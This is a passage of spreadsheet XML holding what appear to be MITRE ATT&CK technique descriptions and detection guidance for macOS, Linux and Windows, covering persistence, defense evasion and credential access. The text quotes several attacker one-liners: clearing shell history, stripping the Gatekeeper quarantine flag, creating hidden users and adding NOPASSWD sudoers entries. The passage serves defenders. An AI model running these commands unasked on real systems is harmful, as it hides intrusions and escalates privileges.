    <t>Bash keeps track of the commands users type on the command-line with the "history"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Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)</t>
  </si>
  <si>
    <t>Deobfuscate/Decode Files or Information</t>
  </si>
  <si>
    <t>Detecting the action of deobfuscating or decoding files or information may be difficult depending on the implementation. If the functionality is contained within malware and uses the Windows API, then attempting to detect malicious behavior before or after the action may yield better results than attempting to perform analysis on loaded libraries or API calls. If scripts are used, then collecting the scripts for analysis may be necessary. Perform process and command-line monitoring to detect potentially malicious behavior related to scripts and system utilities such as [certutil](https://attack.mitre.org/software/S0160).
Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.</t>
  </si>
  <si>
    <t>Input Prompt</t>
  </si>
  <si>
    <t>macOS</t>
  </si>
  <si>
    <t>Keychain</t>
  </si>
  <si>
    <t>System calls,Process monitoring</t>
  </si>
  <si>
    <t>Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it.</t>
  </si>
  <si>
    <t>Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in &lt;code&gt;~/Library/Keychains/&lt;/code&gt;,&lt;code&gt;/Library/Keychains/&lt;/code&gt;, and &lt;code&gt;/Network/Library/Keychains/&lt;/code&gt;. (Citation: Wikipedia keychain) The &lt;code&gt;security&lt;/code&gt; command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.
To manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user’s logon credentials.</t>
  </si>
  <si>
    <t>Hidden Window</t>
  </si>
  <si>
    <t>Gatekeeper Bypass</t>
  </si>
  <si>
    <t>In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called &lt;code&gt;com.apple.quarantine&lt;/code&gt;. This attribute is read by Apple's Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution. 
Apps loaded onto the system from USB flash drive, optical disk, external hard drive, or even from a drive shared over the local network won’t set this flag. Additionally, other utilities or events like drive-by downloads don’t necessarily set it either. This completely bypasses the built-in Gatekeeper check. (Citation: Methods of Mac Malware Persistence) The presence of the quarantine flag can be checked by the xattr command &lt;code&gt;xattr /path/to/MyApp.app&lt;/code&gt; for &lt;code&gt;com.apple.quarantine&lt;/code&gt;. Similarly, given sudo access or elevated permission, this attribute can be removed with xattr as well, &lt;code&gt;sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app&lt;/code&gt;. (Citation: Clearing quarantine attribute) (Citation: OceanLotus for OS X)
In typical operation, a file will be downloaded from the internet and given a quarantine flag before being saved to disk. When the user tries to open the file or application, macOS’s gatekeeper will step in and check for the presence of this flag. If it exists, then macOS will then prompt the user to confirmation that they want to run the program and will even provide the URL where the application came from. However, this is all based on the file being downloaded from a quarantine-savvy application. (Citation: Bypassing Gatekeeper)</t>
  </si>
  <si>
    <t>Private Keys</t>
  </si>
  <si>
    <t>Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication.</t>
  </si>
  <si>
    <t>Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures. (Citation: Wikipedia Public Key Crypto)
Adversaries may gather private keys from compromised systems for use in authenticating to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email. Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. Adversaries may also look in common key directories, such as &lt;code&gt;~/.ssh&lt;/code&gt; for SSH keys on * nix-based systems or &lt;code&gt;C:\Users\(username)\.ssh\&lt;/code&gt; on Windows.
Private keys should require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line.
Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates. (Citation: Kaspersky Careto) (Citation: Palo Alto Prince of Persia)</t>
  </si>
  <si>
    <t>Clear Command History</t>
  </si>
  <si>
    <t>Authentication logs,File monitoring</t>
  </si>
  <si>
    <t>User authentication, especially via remote terminal services like SSH, without new entries in that user's &lt;code&gt;~/.bash_history&lt;/code&gt; is suspicious. Additionally, the modification of the HISTFILE and HISTFILESIZE environment variables or the removal/clearing of the &lt;code&gt;~/.bash_history&lt;/code&gt; file are indicators of suspicious activity.</t>
  </si>
  <si>
    <t>macOS and Linux both keep track of the commands users type in their terminal so that users can easily remember what they've done. These logs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 Since everything typed on the command-line is saved, passwords passed in on the command line are also saved. Adversaries can abuse this by searching these files for cleartext passwords. Additionally, adversaries can use a variety of methods to prevent their own commands from appear in these logs such as &lt;code&gt;unset HISTFILE&lt;/code&gt;, &lt;code&gt;export HISTFILESIZE=0&lt;/code&gt;, &lt;code&gt;history -c&lt;/code&gt;, &lt;code&gt;rm ~/.bash_history&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Hidden Users</t>
  </si>
  <si>
    <t>This technique prevents the new user from showing up at the log in screen, but all of the other signs of a new user still exist. The user still gets a home directory and will appear in the authentication logs.</t>
  </si>
  <si>
    <t>Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in &lt;code&gt;/Library/Preferences/com.apple.loginwindow&lt;/code&gt; called &lt;code&gt;Hide500Users&lt;/code&gt; that prevents users with userIDs 500 and lower from appearing at the login screen. By using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 and enabling this property (setting it to Yes), an adversary can hide their user accounts much more easily: &lt;code&gt;sudo dscl . -create /Users/username UniqueID 401&lt;/code&gt; (Citation: Cybereason OSX Pirrit).</t>
  </si>
  <si>
    <t>HISTCONTROL</t>
  </si>
  <si>
    <t>Process monitoring,Authentication logs,File monitoring,Environment variable</t>
  </si>
  <si>
    <t>Correlating a user session with a distinct lack of new commands in their &lt;code&gt;.bash_history&lt;/code&gt; can be a clue to suspicious behavior. Additionally, users checking or changing their &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable is also suspicious.</t>
  </si>
  <si>
    <t>The &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable keeps track of what should be saved by the &lt;code&gt;history&lt;/code&gt; command and eventually into the &lt;code&gt;~/.bash_history&lt;/code&gt; file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to "ignorespace". &lt;code&gt;HISTCONTROL&lt;/code&gt; can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. &lt;code&gt;HISTCONTROL&lt;/code&gt; does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands.</t>
  </si>
  <si>
    <t>LC_MAIN Hijacking</t>
  </si>
  <si>
    <t>Binary file metadata,Malware reverse engineering,Process monitoring</t>
  </si>
  <si>
    <t>Determining the original entry point for a binary is difficult, but checksum and signature verification is very possible. Modifying the LC_MAIN entry point or adding in an additional LC_MAIN entry point invalidates the signature for the file and can be detected. Collect running process information and compare against known applications to look for suspicious behavior.</t>
  </si>
  <si>
    <t>As of OS X 10.8, mach-O binaries introduced a new header called LC_MAIN that points to the binary’s entry point for execution. Previously, there were two headers to achieve this same effect: LC_THREAD and LC_UNIXTHREAD  (Citation: Prolific OSX Malware History). The entry point for a binary can be hijacked so that initial execution flows to a malicious addition (either another section or a code cave) and then goes back to the initial entry point so that the victim doesn’t know anything was different  (Citation: Methods of Mac Malware Persistence). By modifying a binary in this way, application whitelisting can be bypassed because the file name or application path is still the same.</t>
  </si>
  <si>
    <t>Plist Modification</t>
  </si>
  <si>
    <t>File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like "Knock Knock" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed.
Monitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity.</t>
  </si>
  <si>
    <t>defense-evasion,persistence,privilege-escalation</t>
  </si>
  <si>
    <t>Space after Filename</t>
  </si>
  <si>
    <t>It's not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious.</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</si>
  <si>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evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to "evil.txt " (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back). 
Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.</t>
  </si>
  <si>
    <t>Launchctl</t>
  </si>
  <si>
    <t>Knock Knock can be used to detect persistent programs such as those installed via launchctl as launch agents or launch daemons. Additionally, every launch agent or launch daemon must have a corresponding plist file on disk somewhere which can be monitored. Monitor process execution from launchctl/launchd for unusual or unknown processes.</t>
  </si>
  <si>
    <t>Launchctl controls the macOS launchd process which handles things like launch agents and launch daemons, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input. By loading or reloading launch agents or launch daemons, adversaries can install persistence or execute changes they made  (Citation: Sofacy Komplex Trojan). Running a command from launchctl is as simple as &lt;code&gt;launchctl submit -l &lt;labelName&gt; -- /Path/to/thing/to/execute "arg" "arg" "arg"&lt;/code&gt;. Loading, unloading, or reloading launch agents or launch daemons can require elevated privileges. 
Adversaries can abuse this functionality to execute code or even bypass whitelisting if launchctl is an allowed process.</t>
  </si>
  <si>
    <t>defense-evasion,execution,persistence</t>
  </si>
  <si>
    <t>Source</t>
  </si>
  <si>
    <t>Monitor for command shell execution of source and subsequent processes that are started as a result of being executed by a source command. Adversaries must also drop a file to disk in order to execute it with source, and these files can also detected by file monitoring.</t>
  </si>
  <si>
    <t>Trap</t>
  </si>
  <si>
    <t>Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.</t>
  </si>
  <si>
    <t>execution,persistence</t>
  </si>
  <si>
    <t>AppleScript</t>
  </si>
  <si>
    <t>API monitoring,System calls,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Monitor for execution of AppleScript through osascript that may be related to other suspicious behavior occurring on the system.</t>
  </si>
  <si>
    <t>.bash_profile and .bashrc</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process command-line parameters,Process use of network</t>
  </si>
  <si>
    <t>While users may customize their &lt;code&gt;~/.bashrc&lt;/code&gt; and &lt;code&gt;~/.bash_profile&lt;/code&gt; files , there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.</t>
  </si>
  <si>
    <t>Dylib Hijacking</t>
  </si>
  <si>
    <t>Objective-See's Dylib Hijacking Scanner can be used to detect potential cases of dylib hijacking. Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process.</t>
  </si>
  <si>
    <t>macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries can take advantage of ambiguous paths to plant dylibs to gain privilege escalation or persistence.
A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itself. (Citation: Writing Bad Malware for OSX) (Citation: Malware Persistence on OS X)
If the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level. This can be used by adversaries as a privilege escalation technique.</t>
  </si>
  <si>
    <t>Hidden Files and Directories</t>
  </si>
  <si>
    <t>Monitor the file system and shell commands for files being created with a leading "." and the Windows command-line use of attrib.exe to add the hidden attribute.</t>
  </si>
  <si>
    <t>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
Adversaries can use this to their advantage to hide files and folders anywhere on the system for persistence and evading a typical user or system analysis that does not incorporate investigation of hidden files.
### Windows
Users can mark specific files as hidden by using the attrib.exe binary. Simply do &lt;code&gt;attrib +h filename&lt;/code&gt; to mark a file or folder as hidden. Similarly, the “+s” marks a file as a system file and the “+r” flag marks the file as read only. Like most windows binaries, the attrib.exe binary provides the ability to apply these changes recursively “/S”.
### Linux/Mac
Users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name  (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folder that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable. For command line usages, there is typically a flag to see all files (including hidden ones). To view these files in the Finder Application, the following command must be executed: &lt;code&gt;defaults write com.apple.finder AppleShowAllFiles YES&lt;/code&gt;, and then relaunch the Finder Application.
### Mac
Files on macOS can be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker).
Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.</t>
  </si>
  <si>
    <t>Launch Agent</t>
  </si>
  <si>
    <t>Monitor Launch Agent creation through additional plist files and utilities such as Objective-See’s  KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.</t>
  </si>
  <si>
    <t>Per Apple’s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in &lt;code&gt;/System/Library/LaunchAgents&lt;/code&gt;, &lt;code&gt;/Library/LaunchAgents&lt;/code&gt;, and &lt;code&gt;$HOME/Library/LaunchAgents&lt;/code&gt; (Citation: AppleDocs Launch Agent Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). These launch agents have property list files which point to the executables that will be launched (Citation: OSX.Dok Malware).
Adversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories  (Citation: Sofacy Komplex Trojan)  (Citation: Methods of Mac Malware Persistence). The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log in (Citation: OSX Malware Detection) (Citation: OceanLotus for OS X). They can be set up to execute when a specific user logs in (in the specific user’s directory structure) or when any user logs in (which requires administrator privileges).</t>
  </si>
  <si>
    <t>Launch Daemon</t>
  </si>
  <si>
    <t>Process monitoring,File monitoring</t>
  </si>
  <si>
    <t>Monitor Launch Daemon creation through additional plist files and utilities such as Objective-See's Knock Knock application.</t>
  </si>
  <si>
    <t>Per Apple’s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in &lt;code&gt;/System/Library/LaunchDaemons&lt;/code&gt; and &lt;code&gt;/Library/LaunchDaemons&lt;/code&gt; (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).
Adversaries may install a new launch daemon that can be configured to execute at startup by using launchd or launchctl to load a plist into the appropriate directories (Citation: OSX Malware Detection). The daemon name may be disguised by using a name from a related operating system or benign software  (Citation: WireLurker). Launch Daemons may be created with administrator privileges, but are executed under root privileges, so an adversary may also use a service to escalate privileges from administrator to root.
The plist file permissions must be root:wheel, but the script or program that it points to has no such requirement. So, it is possible for poor configurations to allow an adversary to modify a current Launch Daemon’s executable and gain persistence or Privilege Escalation.</t>
  </si>
  <si>
    <t>LC_LOAD_DYLIB Addition</t>
  </si>
  <si>
    <t>Binary file metadata,Process monitoring,Process command-line parameters,File monitoring</t>
  </si>
  <si>
    <t>Monitor processes for those that may be used to modify binary headers. Monitor file systems for changes to application binaries and invalid checksums/signatures. Changes to binaries that do not line up with application updates or patches are also extremely suspicious.</t>
  </si>
  <si>
    <t>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adjustments are made to the rest of the fields and dependencies (Citation: Writing Bad Malware for OSX). There are tools available to perform these changes. Any changes will invalidate digital signatures on binaries because the binary is being modified. Adversaries can remediate this issue by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time (Citation: Malware Persistence on OS X).</t>
  </si>
  <si>
    <t>Login Item</t>
  </si>
  <si>
    <t>File monitoring,API monitoring</t>
  </si>
  <si>
    <t>All the login items created via shared file lists are viewable by going to the Apple menu -&gt; System Preferences -&gt; Users &amp; Groups -&gt; Login items. This area (and the corresponding file locations) should be monitored and whitelisted for known good applications. Otherwise, Login Items are located in &lt;code&gt; Contents/Library/LoginItems &lt;/code&gt; within an application bundle, so these paths should be monitored as well  (Citation: Adding Login Items). Monitor process execution resulting from login actions for unusual or unknown applications.</t>
  </si>
  <si>
    <t>MacOS provides the option to list specific applications to run when a user logs in. These applications run under the logged in user's context, and will be started every time the user logs in. Login items installed using the Service Management Framework are not visible in the System Preferences and can only be removed by the application that created them (Citation: Adding Login Items). Users have direct control over login items installed using a shared file list which are also visible in System Preferences (Citation: Adding Login Items). These login items are stored in the user's &lt;code&gt;~/Library/Preferences/&lt;/code&gt; directory in a plist file called &lt;code&gt;com.apple.loginitems.plist&lt;/code&gt; (Citation: Methods of Mac Malware Persistence). Some of these applications can open visible dialogs to the user, but they don’t all have to since there is an option to ‘Hide’ the window. If an adversary can register their own login item or modified an existing one, then they can use it to execute their code for a persistence mechanism each time the user logs in (Citation: Malware Persistence on OS X) (Citation: OSX.Dok Malware). The API method &lt;code&gt; SMLoginItemSetEnabled &lt;/code&gt; can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1155) can do this as well  (Citation: Adding Login Items).</t>
  </si>
  <si>
    <t>Rc.common</t>
  </si>
  <si>
    <t>The &lt;code&gt;/etc/rc.common&lt;/code&gt; file can be monitored to detect changes from the company policy. Monitor process execution resulting from the rc.common script for unusual or unknown applications or behavior.</t>
  </si>
  <si>
    <t>During the boot process, macOS executes &lt;code&gt;source /etc/rc.common&lt;/code&gt;, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings, and is thus recommended to include in the start of Startup Item Scripts (Citation: Startup Items). In macOS and OS X, this is now a deprecated technique in favor of launch agents and launch daemons, but is currently still used.
Adversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user (Citation: Methods of Mac Malware Persistence).</t>
  </si>
  <si>
    <t>Re-opened Applications</t>
  </si>
  <si>
    <t>Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened.</t>
  </si>
  <si>
    <t>Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user reboots their machine. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at &lt;code&gt;~/Library/Preferences/com.apple.loginwindow.plist&lt;/code&gt; and &lt;code&gt;~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist&lt;/code&gt;. 
An adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence).</t>
  </si>
  <si>
    <t>Startup Items</t>
  </si>
  <si>
    <t>The &lt;code&gt;/Library/StartupItems&lt;/code&gt; folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist. Monitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior.</t>
  </si>
  <si>
    <t>Per Apple’s documentation, startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items (Citation: Startup Items). This is technically a deprecated version (superseded by Launch Daemons), and thus the appropriate folder, &lt;code&gt;/Library/StartupItems&lt;/code&gt; isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), &lt;code&gt;StartupParameters.plist&lt;/code&gt;, reside in the top-level directory. 
An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of macOS, they will run as root. If an adversary is able to modify an existing Startup Item, then they will be able to Privilege Escalate as well.</t>
  </si>
  <si>
    <t>Setuid and Setgid</t>
  </si>
  <si>
    <t>Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.</t>
  </si>
  <si>
    <t>When the setuid or setgid bits are set on Linux or macOS for an application, this means that the application will run with the privileges of the owning user or group respectively  (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. There are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges. Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an "s" instead of an "x" when viewing a file's attributes via &lt;code&gt;ls -l&lt;/code&gt;. The &lt;code&gt;chmod&lt;/code&gt; program can set these bits with via bitmasking, &lt;code&gt;chmod 4777 [file]&lt;/code&gt; or via shorthand naming, &lt;code&gt;chmod u+s [file]&lt;/code&gt;.
An adversary can take advantage of this to either do a shell escape or exploit a vulnerability in an application with the setsuid or setgid bits to get code running in a different user’s context. Additionally, adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future  (Citation: OSX Keydnap malware).</t>
  </si>
  <si>
    <t>privilege-escalation,persistence</t>
  </si>
  <si>
    <t>Securityd Memory</t>
  </si>
  <si>
    <t>In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. (Citation: OS X Keychain) (Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password. (Citation: OS X Keychain)
If an adversary can obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc. (Citation: OS X Keychain) (Citation: OSX Keydnap malware)</t>
  </si>
  <si>
    <t>Local Job Scheduling</t>
  </si>
  <si>
    <t>Legitimate scheduled jobs may be created during installation of new software or through administration functions. Jobs scheduled with launchd and cron can be monitored from their respective utilities to list out detailed information about the jobs. Monitor process execution resulting from launchd and cron tasks to look for unusual or unknown applications and behavior.</t>
  </si>
  <si>
    <t>On Linux and macOS systems, multiple methods are supported for creating pre-scheduled and periodic background jobs: cron, (Citation: Die.net Linux crontab Man Page) at, (Citation: Die.net Linux at Man Page) and launchd. (Citation: AppleDocs Scheduling Timed Jobs) Unlike [Scheduled Task](https://attack.mitre.org/techniques/T1053) on Windows systems, job scheduling on Linux-based systems cannot be done remotely unless used in conjunction within an established remote session, like secure shell (SSH).
### cron
System-wide cron jobs are installed by modifying &lt;code&gt;/etc/crontab&lt;/code&gt; file, &lt;code&gt;/etc/cron.d/&lt;/code&gt; directory or other locations supported by the Cron daemon, while per-user cron jobs are installed using crontab with specifically formatted crontab files. (Citation: AppleDocs Scheduling Timed Jobs) This works on macOS and Linux systems.
Those methods allow for commands or scripts to be executed at specific, periodic intervals in the background without user interaction. An adversary may use job scheduling to execute programs at system startup or on a scheduled basis for Persistence, (Citation: Janicab) (Citation: Methods of Mac Malware Persistence) (Citation: Malware Persistence on OS X) (Citation: Avast Linux Trojan Cron Persistence) to conduct Execution as part of Lateral Movement, to gain root privileges, or to run a process under the context of a specific account.
### at
The at program is another means on POSIX-based systems, including macOS and Linux, to schedule a program or script job for execution at a later date and/or time, which could also be used for the same purposes.
### launchd
Each launchd job is described by a different configuration property list (plist) file similar to [Launch Daemon](https://attack.mitre.org/techniques/T1160) or [Launch Agent](https://attack.mitre.org/techniques/T1159), except there is an additional key called &lt;code&gt;StartCalendarInterval&lt;/code&gt; with a dictionary of time values. (Citation: AppleDocs Scheduling Timed Jobs) This only works on macOS and OS X.</t>
  </si>
  <si>
    <t>persistence,execution</t>
  </si>
  <si>
    <t>Sudo</t>
  </si>
  <si>
    <t>On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).</t>
  </si>
  <si>
    <t>The sudoers file, &lt;code&gt;/etc/sudoers&lt;/code&gt;, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the idea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&lt;code&gt;user1 ALL=(ALL) NOPASSWD: ALL&lt;/code&gt; (Citation: OSX.Dok Malware). 
Adversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. You must have elevated privileges to edit this file though.</t>
  </si>
  <si>
    <t>Mshta</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the binary being executed.
Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious.</t>
  </si>
  <si>
    <t>Domain Fronting</t>
  </si>
  <si>
    <t>SSL/TLS inspection,Packet capture</t>
  </si>
  <si>
    <t>If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blacklist or whitelist of domain names. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015)</t>
  </si>
  <si>
    <t>Domain fronting takes advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) The technique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
For example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.</t>
  </si>
  <si>
    <t>Dynamic Data Exchange</t>
  </si>
  <si>
    <t>API monitoring,DLL monitoring,Process monitoring,Windows Registry,Windows event logs</t>
  </si>
  <si>
    <t>OLE and Office Open XML files can be scanned for ‘DDEAUTO', ‘DDE’, and other strings indicative of DDE execution. (Citation: NVisio Labs DDE Detection Oct 2017)
Monitor for Microsoft Office applications loading DLLs and other modules not typically associated with the application.
Monitor for spawning of unusual processes (such as cmd.exe) from Microsoft Office applications.</t>
  </si>
  <si>
    <t>Windows Dynamic Data Exchange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
Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by COM, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)
Adversaries may use DDE to execute arbitrary commands. Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to command line execution.</t>
  </si>
  <si>
    <t>Password Filter DLL</t>
  </si>
  <si>
    <t>DLL monitoring,Process monitoring,Windows Registry</t>
  </si>
  <si>
    <t>Monitor for change notifications to and from unfamiliar password filters.
Newly installed password filters will not take effect until after a system reboot.
Password filters will show up as an autorun and loaded DLL in lsass.exe. (Citation: Clymb3r Function Hook Passwords Sept 2013)</t>
  </si>
  <si>
    <t>Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as dynamic link libraries (DLLs) containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts.
Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation.
Adversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made. (Citation: Carnal Ownage Password Filters Sept 2013)</t>
  </si>
  <si>
    <t>Browser Extensions</t>
  </si>
  <si>
    <t>Network protocol analysis,Packet capture,System calls,Process use of network,Process monitoring,Browser extensions</t>
  </si>
  <si>
    <t>Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates.
Monitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation.</t>
  </si>
  <si>
    <t>Browser extensions or plugins are small programs that can add functionality and customize aspects of internet browsers. They can be installed directly or through a browser's app store. Extensions generally have access and permissions to everything that the browser can access. (Citation: Wikipedia Browser Extension) (Citation: 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may not be difficult for malicious extensions to defeat automated scanners and be uploaded. (Citation: Malicious Chrome Extension Numbers) Once the extension is installed, it can browse to websites in the background, (Citation: Chrome Extension Crypto Miner) (Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser, to include credentials, (Citation: Banker Google Chrome Extension Steals Creds) (Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence. There have been instances of botnets using a persistent backdoor through malicious Chrome extensions. (Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command &amp; control  (Citation: Chrome Extension C2 Malware).</t>
  </si>
  <si>
    <t>LSASS Driver</t>
  </si>
  <si>
